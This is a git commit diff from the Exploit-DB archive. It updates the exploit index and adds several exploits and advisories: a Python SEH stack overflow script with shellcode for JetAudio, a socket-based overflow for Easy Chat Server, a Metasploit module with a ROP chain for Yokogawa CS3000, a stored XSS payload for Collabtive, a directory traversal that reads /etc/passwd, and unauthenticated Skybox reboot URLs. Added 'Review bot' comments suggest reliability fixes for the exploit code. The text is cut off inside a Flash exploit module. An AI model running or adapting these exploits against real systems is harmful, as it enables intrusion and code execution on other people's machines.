Updated 05_14_2014

Offensive Security 2014-05-14 04:36:12 +00:00
parent b809e3cca6
commit 3a841992e3
13 changed files with 2252 additions and 54 deletions


@ -8845,7 +8845,7 @@ id,file,description,date,author,platform,type,port
9371,platforms/php/webapps/9371.txt,"opennews 1.0 (sqli/rce) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0
9372,platforms/php/webapps/9372.txt,"Portel 2008 - (decide.php patron) Blind SQL Injection Vulnerability",2009-08-05,"Chip d3 bi0s",php,webapps,0
9373,platforms/freebsd/dos/9373.c,"FreeBSD 7.2-RELEASE SCTP Local Kernel Denial of Service Exploit",2009-08-06,"Shaun Colley",freebsd,dos,0
9375,platforms/windows/local/9375.py,"JetAudio 7.1.9.4030 Universal Stack Overflow Exploit (SEH)",2009-08-06,Dr_IDE,windows,local,0
9375,platforms/windows/local/9375.py,"JetAudio 7.1.9.4030 (.m3u) - Universal Stack Overflow Exploit (SEH)",2009-08-06,Dr_IDE,windows,local,0
9376,platforms/windows/dos/9376.py,"jetAudio <= 7.5.5 plus vx (M3U/ASX/WAX/WVX) Local Crash PoC",2009-09-10,Dr_IDE,windows,dos,0
9377,platforms/windows/local/9377.pl,"A2 Media Player Pro 2.51 (.m3u /m3l) Universal Local BOF Exploit (SEH)",2009-08-06,hack4love,windows,local,0
9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster (Topic Delete/XSS) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0
@ -9873,7 +9873,7 @@ id,file,description,date,author,platform,type,port
10647,platforms/php/webapps/10647.txt,"VideoIsland Remote shell upload Vulnerability",2009-12-24,RENO,php,webapps,0
10648,platforms/php/webapps/10648.txt,"cms -db <= 0.7.13 - Multiple Vulnerabilities",2009-12-25,"cp77fk4r ",php,webapps,0
10649,platforms/windows/webapps/10649.html,"SoftCab Sound Converter ActiveX Insecure Method Exploit (sndConverter.ocx)",2009-12-25,"ThE g0bL!N",windows,webapps,0
10650,platforms/windows/dos/10650.pl,"jetAudio 8.0.0.0 - Basic Local Crash PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0
10650,platforms/windows/dos/10650.pl,"jetAudio 8.0.0.0 (.asx) - Basic Local Crash PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0
10651,platforms/windows/dos/10651.pl,"JetAudio Basic 7.5.5.25 .asx Buffer Overflow PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0
10652,platforms/php/webapps/10652.txt,"asaher pro 1.0 RFI Vulnerability",2009-12-25,indoushka,php,webapps,0
10653,platforms/php/webapps/10653.txt,"Winn Guestbook 2.4, Winn.ws - Cross Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0
@ -10278,7 +10278,7 @@ id,file,description,date,author,platform,type,port
11204,platforms/windows/remote/11204.html,"AOL 9.5 ActiveX 0day Exploit (heap spray)",2010-01-20,Dz_attacker,windows,remote,0
11205,platforms/windows/local/11205.pl,"MP3 Studio 1.x - (.m3u File) Local Stack Overflow (Universal)",2010-01-20,"D3V!L FUCKER",windows,local,0
11208,platforms/windows/local/11208.pl,"jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit",2010-01-21,"cr4wl3r ",windows,local,0
11209,platforms/windows/dos/11209.pl,"jetAudio 8.0.0.2 Basic Local Crash Exploit",2010-01-21,"cr4wl3r ",windows,dos,0
11209,platforms/windows/dos/11209.pl,"jetAudio 8.0.0.2 Basic (.asx) - Local Crash Exploit",2010-01-21,"cr4wl3r ",windows,dos,0
11210,platforms/windows/remote/11210.rb,"EFS Easy Chat server Universal BOF-SEH (Meta)",2010-01-21,fb1h2s,windows,remote,0
11211,platforms/multiple/webapps/11211.txt,"cPanel HTTP Response Splitting Vulnerability",2010-01-21,Trancer,multiple,webapps,0
11212,platforms/asp/webapps/11212.txt,"eWebeditor Directory Traversal",2010-01-21,N/A,asp,webapps,0
@ -29250,7 +29250,7 @@ id,file,description,date,author,platform,type,port
32479,platforms/php/webapps/32479.txt,"BigDump 0.35b - Arbitrary Upload",2014-03-24,"felipe andrian",php,webapps,0
32481,platforms/windows/dos/32481.txt,"Light Audio Player 1.0.14 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0
32482,platforms/windows/dos/32482.py,"GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0
32483,platforms/windows/dos/32483.py,"GOM Video Converter 1.1.0.60 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0
32483,platforms/windows/dos/32483.py,"GOM Video Converter 1.1.0.60 (.wav) - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0
32485,platforms/asp/webapps/32485.txt,"ASP Indir Iltaweb Alisveris Sistemi 'xurunler.asp' SQL Injection Vulnerability",2008-10-13,tRoot,asp,webapps,0
32486,platforms/php/webapps/32486.txt,"Webscene eCommerce 'productlist.php' SQL Injection Vulnerability",2008-10-14,"Angela Chang",php,webapps,0
32487,platforms/php/webapps/32487.txt,"Elxis CMS 2008.1 modules/mod_language.php Multiple Parameter XSS",2008-10-14,faithlove,php,webapps,0
@ -29976,6 +29976,8 @@ id,file,description,date,author,platform,type,port
33247,platforms/hardware/webapps/33247.txt,"OpenFiler 2.99.1 - Arbitrary Code Execution",2014-05-08,"Dolev Farhi",hardware,webapps,0
33248,platforms/hardware/webapps/33248.txt,"OpenFiler 2.99.1 - Multiple persistent XSS Vulnerabilities",2014-05-08,"Dolev Farhi",hardware,webapps,0
33249,platforms/php/webapps/33249.txt,"Collabtive 1.2 - SQL Injection",2014-05-08,"Deepak Rathore",php,webapps,0
33250,platforms/php/webapps/33250.txt,"Collabtive 1.2 - Stored XSS",2014-05-08,"Deepak Rathore",php,webapps,0
33251,platforms/multiple/local/33251.txt,"Python - Interpreter Heap Memory Corruption (PoC)",2014-05-08,"Debasish Mandal",multiple,local,0
33252,platforms/php/webapps/33252.txt,"Cobbler 2.4.x - 2.6.x - LFI Vulnerability",2014-05-08,"Dolev Farhi",php,webapps,0
33254,platforms/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 'simpleSearch.do' Cross Site Scripting Vulnerability",2009-09-23,IBM,java,webapps,0
33255,platforms/linux/local/33255.txt,"Xen 3.x pygrub Local Authentication Bypass Vulnerability",2009-09-25,"Jan Lieskovsky",linux,local,0
@ -30038,3 +30040,12 @@ id,file,description,date,author,platform,type,port
33320,platforms/php/webapps/33320.txt,"TFTgallery 0.13 'sample' Parameter Cross Site Scripting Vulnerability",2009-11-02,blake,php,webapps,0
33321,platforms/linux/local/33321.c,"Linux Kernel 2.6.x 'pipe.c' Local Privilege Escalation Vulnerability (1)",2009-11-03,"teach & xipe",linux,local,0
33322,platforms/linux/local/33322.c,"Linux Kernel 2.6.x pipe.c Local Privilege Escalation Vulnerability (2)",2009-11-03,"teach & xipe",linux,local,0
33326,platforms/windows/remote/33326.py,"Easy Chat Server 3.1 - Stack Buffer Overflow",2014-05-12,superkojiman,windows,remote,0
33327,platforms/hardware/webapps/33327.txt,"Skybox Security 6.3.x - 6.4.x - Multiple Information Disclosure",2014-05-12,"Luigi Vezzoso",hardware,webapps,0
33328,platforms/hardware/dos/33328.txt,"Skybox Security 6.3.x - 6.4.x - Multiple Denial Of Service Issue",2014-05-12,"Luigi Vezzoso",hardware,dos,0
33330,platforms/windows/webapps/33330.txt,"SpiceWorks 7.2.00174 - Persistent XSS Vulnerabilities",2014-05-12,"Dolev Farhi",windows,webapps,80
33331,platforms/windows/remote/33331.rb,"Yokogawa CS3000 BKESimmgr.exe Buffer Overflow",2014-05-12,metasploit,windows,remote,34205
33332,platforms/windows/dos/33332.py,"JetAudio 8.1.1 (.ogg) - Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0
33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0
33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80
33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 (.ogg) - Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0


platforms/cgi/webapps/33334.txt Executable file

@ -0,0 +1,33 @@
Product: VM Turbo Operations Manager
Vendor: VM Turbo
Vulnerable Version(s): 4.5.x earlier
Tested Version: 4.0
Advisory Publication: April 11, 2014
Vendor Notification: April 11, 2014
Public Disclosure: May 8, 2014
Vulnerability Type: Directory Traversal
Discovered and Provided: (Jamal Pecou) Security Focus ( https://www.securityfocus.com/ )
------------------------------------------------------------------------
-----------------------
Advisory Details:
A vulnerability affecting “/cgi-bin/help/doIt.cgi" in VM Turbo Operations Manager allows directory traversal when the URL encoded POST input “xml_path” was set to “../../../../../../../../../../etc/passwd” we could see the contents of this file.
The following exploitation example displays the contents of /etc/passwd
http://[host]/cgi-bin/help/doIt.cgi?FUNC=load_xml_file&xml_path=../../../../../../../../../../etc/passwd
------------------------------------------------------------------------
-----------------------
Solution:
The vendor has released a fix for this vulnerability in version 4.6.
References:
[1] https://support.vmturbo.com/hc/en-us/articles/203170127-VMTurbo-Operations-Manager-v4-6-Announcement
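Review bot: The "Advisory Details" paragraph says the traversal is reached through the URL-encoded POST input `xml_path`, but the only example given passes `FUNC=load_xml_file&xml_path=...` as a GET query string; the advisory should state which request method(s) the handler actually accepts, since a detection rule written for POST bodies alone would miss the example shown. The version fields are also inconsistent: `Vulnerable Version(s): 4.5.x earlier` is missing a word (presumably "and earlier") and `Tested Version: 4.0` does not match the files.csv description "VM Turbo Operations Manager 4.5x". Suggested wording: `Vulnerable Version(s): 4.5.x and earlier (fixed in 4.6)`, with the tested version corrected to the build the test was actually run against.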


@ -0,0 +1,42 @@
# Exploit Title: [SKYBOX Security - DDOS]
# Date: [22-Jan-2014]
# Exploit Author: [Luigi Vezzoso]
# Vendor Homepage: [http://www.skyboxsecurity.com]
# Version: [Skybox View Appliances with ISO versions: 6.3.33-2.14,
6.3.31-2.14, 6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57]
# Tested on: [Centos 6.4 kernel 2.6.32]
# CVE : [CVE-2014-2085]
#OVERVIEW
A vulnerability has been found in some Skybox View Appliances Admin
interfaces which would allow a potential malicious party to bypass
the authentication mechanism and execute reboot and/or shutdown of
appliance self
#INTRODUCTION
Skybox Security has a complete portfolio of security management
tools that deliver the security intelligence needed to act fast to
minimize risks and eliminate attack vectors. Based on a powerful
risk analytics platform that links data from vulnerability scanners,
threat intelligence feeds, firewalls and other network infrastructure
devices Skybox gives you context to prioritize risks accurately and
automatically, in minutes.
#VULNERABILITY DESCRIPTION
It's possible to open and execute the reboot and shutdown script
without autentication at the following links:
https://1.1.1.1:444/scripts/commands/reboot?_=1111111111
https://1.1.1.1:444/scripts/commands/shutdown?_=1111111111
#VERSIONS AFFECTED
Skybox View Appliances with ISO versions: 6.3.33-2.14, 6.3.31-2.14,
6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57
#SOLUTION
Please refer to the vendor security advisor: Security Advisory 2014-
3-25-1
#CREDITS
Luigi Vezzoso
email: luigivezzoso@gmail.com
skype: luigivezzoso
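Review bot: The title `# Exploit Title: [SKYBOX Security - DDOS]` names a distributed denial of service, but the body documents an authentication bypass on the appliance admin interface that lets an unauthenticated caller invoke the reboot/shutdown scripts, which files.csv itself lists as "Multiple Denial Of Service Issue"; `# Exploit Title: [Skybox Security Appliance - Unauthenticated Reboot/Shutdown (DoS)]` would describe it accurately. The overview also needs a wording fix: `without autentication` → `without authentication`, and `shutdown of appliance self` → `shutdown of the appliance itself`. Both this file and the sibling 33327.txt cite `Security Advisory 2014-3-25-1` with no URL or fixed ISO version, so the SOLUTION section gives a defender nothing to act on; add the vendor link or the patched version if either is known.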


@ -0,0 +1,48 @@
# Exploit Title: [SKYBOX Security Multiple
Information Disclosure]
# Date: [22-Jan-2014]
# Exploit Author: [Luigi Vezzoso]
# Vendor Homepage: [http://www.skyboxsecurity.com]
# Version: [Skybox View Appliances with ISO versions: 6.3.33-2.14,
6.3.31-2.14, 6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57]
# Tested on: [Centos 6.4 kernel 2.6.32]
# CVE : [CVE-2014-2084]
#OVERVIEW
A vulnerability has been found in some Skybox View Appliances Admin
interfaces which would allow a potential malicious party to bypass
the authentication mechanism and obtain read-only access to the
appliances administrative menus. This would allow the malicious
party to read system-related information such as interface names, IP
addresses and the appliance status.
#INTRODUCTION
Skybox Security has a complete portfolio of security management
tools that deliver the security intelligence needed to act fast to
minimize risks and eliminate attack vectors. Based on a powerful
risk analytics platform that links data from vulnerability scanners,
threat intelligence feeds, firewalls and other network infrastructure
devices Skybox gives you context to prioritize risks accurately and
automatically, in minutes.
#VULNERABILITY DESCRIPTION
It's possible to obtain useful information about the version and
network configuration of skybox appliances bypassing the webui
interface.
For the appliance system info open with a browser:
https://1.1.1.1:444/scripts/commands/getSystemInformation?_=111111111
For the appliance network info open with a browser:
https://1.1.1.1:444/scripts/commands/getNetworkConfigurationInfo
#VERSIONS AFFECTED
Skybox View Appliances with ISO versions: 6.3.33-2.14, 6.3.31-2.14,
6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57
#SOLUTION
Please refer to the vendor security advisor: Security Advisory 2014-
3-25-1
#CREDITS
Luigi Vezzoso
email: luigivezzoso@gmail.com
skype: luigivezzoso

platforms/multiple/local/33251.txt Executable file


platforms/php/webapps/33250.txt Executable file

@ -0,0 +1,51 @@
Vulnerability title: Stored XSS vulnerability in Collabtive application
(CVE-2014-3247)
CVE: CVE-2014-3247(coordinated with cve assigning team and vendor)
Vendor: Collabtive
Product: Collabtive (Open Source Project Management Software)
Affected version: 1.12
Fixed version: 2.0
Reported by: Deepak Rathore
Severity: Critical
URL: http://[domain]/collabtive-12/admin.php?action=addpro
Affected Users: Authenticated users
Affected parameter(s): desc
Issue details: The value of the desc request parameter is copied into the
HTML document as plain text between tags. The payload 1c91c<img%20src%3da
%20onerror%3dalert(1) >cc245622da6 was submitted in the desc parameter.
This input was echoed as 1c91c<img src=a onerror=alert(1) >cc245622da6 in
the application's response. This proof-of-concept attack demonstrates that
it is possible to inject arbitrary JavaScript into the application's
response. The proof-of-concept attack demonstrated uses an event handler to
introduce arbitrary JavaScript into the document.
HTTP request:
POST /collabtive-12/admin.php?action=addpro HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101
Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/collabtive-12/index.php?mode=login
Cookie: PHPSESSID=ri2sqmga763p7qav73enfv99p5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
name=test&desc=test928a4<img%20src%3da%20onerror%3dalert(1)>a480a723950&neverdue=neverdue&budget=10&assignto%5B%5D=1&assignme=1
Steps to replicate:
1. Login into application
2. Go to "Desktop" tab and click on "Add project"
3. Fill the project details in the project form and click on "Add" button
4. Intercept request by interception proxy i.e. OWASP Zap, Burp Suite etc
5. Replace "desc" parameter value with "1c91c<img%20src%3da
%20onerror%3dalert(1) >cc245622da6"
6. Forward manipulated request to server and wait for response in browser
7. A popup with alert message will come that is the proof of vulnerability.
Tools used: Burp Suite proxy, Mozilla Firefox browser
Best Regards,
Deepak
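Review bot: The version fields do not agree: `Affected version: 1.12` here versus "Collabtive 1.2" in the files.csv entry and `collabtive-12` in the request path, so a reader cannot tell which release was tested (it looks like a dropped or doubled digit); correct the line to whichever build the test was run against, e.g. `Affected version: 1.2`. The payload quoted in "Issue details" (`1c91c<img ... >cc245622da6`) also differs from the one in the captured request (`test928a4<img ...>a480a723950`), which is harmless but worth aligning so the write-up reproduces as written. `Severity: Critical` is a strong rating for a stored XSS that requires an authenticated user to reach `admin.php?action=addpro`; stating the rationale (which users' sessions the stored payload executes in) would make the rating defensible.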

platforms/windows/dos/33332.py Executable file


platforms/windows/dos/33335.py Executable file



@ -1,50 +1,50 @@
#!/usr/bin/env python
###########################################################################################
#
# JetAudio 7.1.9.4030 Universal Stack Overflow Exploit (SEH)
# Coded By: Dr_IDE
# Found By: HACK4LOVE
# Tested on Windows XP SP2
#
############################################################################################
# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
sc = ("\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47"
"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c"
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45"
"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c"
"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44"
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c"
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46"
"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50"
"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44"
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45"
"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43"
"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43"
"\x51\x42\x4c\x42\x43\x43\x30\x41\x41");
jump = ("\xEB\x06\x90\x90");
retn = ("\x45\x10\x22\x01");
nops = ("\x90" * 16);
buff = ("http://" + "\x41" * 1017);
junk = ("\x45" * (876 - len(sc)));
f1 = open('Dr_IDE-JetAudio.M3U','w');
f1.write(buff + jump + retn + nops + sc + junk);
f1.close();
# milw0rm.com [2009-08-06]
#!/usr/bin/env python
###########################################################################################
#
# JetAudio 7.1.9.4030 Universal Stack Overflow Exploit (SEH)
# Coded By: Dr_IDE
# Found By: HACK4LOVE
# Tested on Windows XP SP2
#
############################################################################################
# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
sc = ("\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47"
"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c"
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45"
"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c"
"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44"
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c"
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46"
"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50"
"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44"
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45"
"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43"
"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43"
"\x51\x42\x4c\x42\x43\x43\x30\x41\x41");
jump = ("\xEB\x06\x90\x90");
retn = ("\x45\x10\x22\x01");
nops = ("\x90" * 16);
buff = ("http://" + "\x41" * 1017);
junk = ("\x45" * (876 - len(sc)));
f1 = open('Dr_IDE-JetAudio.M3U','w');
f1.write(buff + jump + retn + nops + sc + junk);
f1.close();
# milw0rm.com [2009-08-06]


@ -0,0 +1,55 @@
## Exploit-DB Note: Must install to 'C:\Program Files\EFS Software\Easy Chat Server'
# Exploit Title: Easy Chat Server 3.1 stack buffer overflow
# Date: 9 May 2014
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.echatserver.com/
# Software Link: http://www.echatserver.com/
# Version: 3.1
# Tested on: Windows 7 Enterprise SP1, English
#
# Description:
# A buffer overflow is triggered when when passing a long username.
import socket
import struct
# calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
# msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin
# [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)
shellcode = (
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
"\x1c\x39\xbd"
)
# SEH overwritten at offset 207 when Easy Chat Server is
# installed in C:\Program Files\EFS Software\Easy Chat Server
payload = "A"*203
payload += "\xeb\x06\x90\x90" # short jmp to shellcode
payload += "\x1e\x0e\x01\x10" # pop/pop/ret @ 0x10010E1E SSLEAY32.DLL
payload += "\x81\xc4\xd8\xfe\xff\xff" # add esp,-128
payload += shellcode # calc.exe
payload += "D"*193
buf = (
"GET /chat.ghp?username=" + payload + "&password=&room=1&sex=1 HTTP/1.1\r\n"
"User-Agent: Mozilla/4.0\r\n"
"Host: 192.168.1.136:80\r\n"
"Accept-Language: en-us\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: http://192.168.1.136\r\n"
"Connection: Keep-Alive\r\n\r\n"
)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.123.131", 80))
s.send(buf)
print s.recv(1024)
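Review bot: The socket opened in the last four lines of the hunk is never closed, and `s.send(buf)` returns the number of bytes actually queued rather than guaranteeing the whole buffer was written, so the script can exit with a partially written request and a dangling descriptor; `s.sendall(buf)` followed by `s.close()` after the `recv` is the idiomatic form. The `print s.recv(1024)` statement also pins the file to Python 2, which the header does not mention; a `# Requires Python 2.x` line next to `# Tested on:` would spare readers a SyntaxError on Python 3. The hard-coded `Host:` header and the `connect` address differ (`192.168.1.136` vs `192.168.123.131`), which reads as a leftover from two test setups and is worth a comment saying both are placeholders.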

platforms/windows/remote/33331.rb Executable file

@ -0,0 +1,160 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Yokogawa CS3000 BKESimmgr.exe Buffer Overflow',
'Description' => %q{
This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability
exists in the BKESimmgr.exe service when handling specially crafted packets, due to an
insecure usage of memcpy, using attacker controlled data as the size count. This module
has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows
2003 SP2.
},
'Author' =>
[
'juan vazquez',
'Redsadic <julian.vilas[at]gmail.com>'
],
'References' =>
[
['CVE', '2014-0782'],
['URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities'],
['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf']
],
'Payload' =>
{
'Space' => 340,
'DisableNops' => true,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Platform' => 'win',
'Targets' =>
[
[
'Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]',
{
'Ret' => 0x61d1274f, # 0x61d1274f # ADD ESP,10 # RETN # libbkebatchepa.dll
'Offset' => 64,
'FakeArgument1' => 0x0040E65C, # ptr to .data on BKESimmgr.exe
'FakeArgument2' => 0x0040EB90 # ptr to .data on BKESimmgr.exe
}
],
],
'DisclosureDate' => 'Mar 10 2014',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(34205)
], self.class)
end
def check
data = create_pkt(rand_text_alpha(4))
res = send_pkt(data)
if res && res.length == 10
simmgr_res = parse_response(res)
if valid_response?(simmgr_res)
check_code = Exploit::CheckCode::Appears
else
check_code = Exploit::CheckCode::Safe
end
else
check_code = Exploit::CheckCode::Safe
end
check_code
end
def exploit
bof = rand_text(target['Offset'])
bof << [target.ret].pack("V")
bof << [target['FakeArgument1']].pack("V")
bof << [target['FakeArgument2']].pack("V")
bof << rand_text(16) # padding (corrupted bytes)
bof << create_rop_chain
bof << payload.encoded
data = [0x1].pack("N") # Sub-operation id, <= 0x8 in order to pass the check at sub_4090B0
data << [bof.length].pack("n")
data << bof
pkt = create_pkt(data)
print_status("Trying target #{target.name}, sending #{pkt.length} bytes...")
connect
sock.put(pkt)
disconnect
end
def create_rop_chain
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x004047ca, # POP ECX # RETN [BKESimmgr.exe]
0x610e3024, # ptr to &VirtualAlloc() [IAT libbkfmtvrecinfo.dll]
0x61232d60, # MOV EAX,DWORD PTR DS:[ECX] # RETN [LibBKESysVWinList.dll]
0x61d19e6a, # XCHG EAX,ESI # RETN [libbkebatchepa.dll]
0x619436d3, # POP EBP # RETN [libbkeeda.dll]
0x61615424, # & push esp # ret [libbkeldc.dll]
0x61e56c8e, # POP EBX # RETN [LibBKCCommon.dll]
0x00000001, # 0x00000001-> ebx
0x61910021, # POP EDX # ADD AL,0 # MOV EAX,6191002A # RETN [libbkeeda.dll]
0x00001000, # 0x00001000-> edx
0x0040765a, # POP ECX # RETN [BKESimmgr.exe]
0x00000040, # 0x00000040-> ecx
0x6191aaab, # POP EDI # RETN [libbkeeda.dll]
0x61e58e04, # RETN (ROP NOP) [LibBKCCommon.dll]
0x00405ffa, # POP EAX # RETN [BKESimmgr.exe]
0x90909090, # nop
0x619532eb # PUSHAD # RETN [libbkeeda.dll]
].pack("V*")
rop_gadgets
end
def create_pkt(data)
pkt = [0x01].pack("N") # Operation Identifier
pkt << [data.length].pack("n") # length
pkt << data # Fake packet
pkt
end
def send_pkt(data)
connect
sock.put(data)
res = sock.get_once
disconnect
res
end
def parse_response(data)
data.unpack("NnN")
end
def valid_response?(data)
valid = false
if data && data[0] == 1 && data[1] == 4 && data[1] == 4 && data[2] == 5
valid = true
end
valid
end
end
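Review bot: `valid_response?` near the end of the hunk compares `data[1] == 4` twice in the same `&&` chain, so one of the two comparisons is dead and the line looks like a copy-paste slip; since `parse_response` unpacks exactly three fields with `"NnN"`, there is no fourth value that could have been meant, and the condition should read `if data && data[0] == 1 && data[1] == 4 && data[2] == 5`. The `valid = false ... valid = true ... valid` scaffolding around it can then collapse to returning the boolean expression directly. In `check`, the `res.length == 10` guard is the only thing protecting the `unpack("NnN")` from short replies; a one-line comment such as `# 4 + 2 + 4 bytes, the exact size parse_response expects` would make that coupling explicit.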

platforms/windows/remote/33333.rb Executable file

@ -0,0 +1,129 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => "Adobe Flash Player Shader Buffer Overflow",
'Description' => %q{
This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
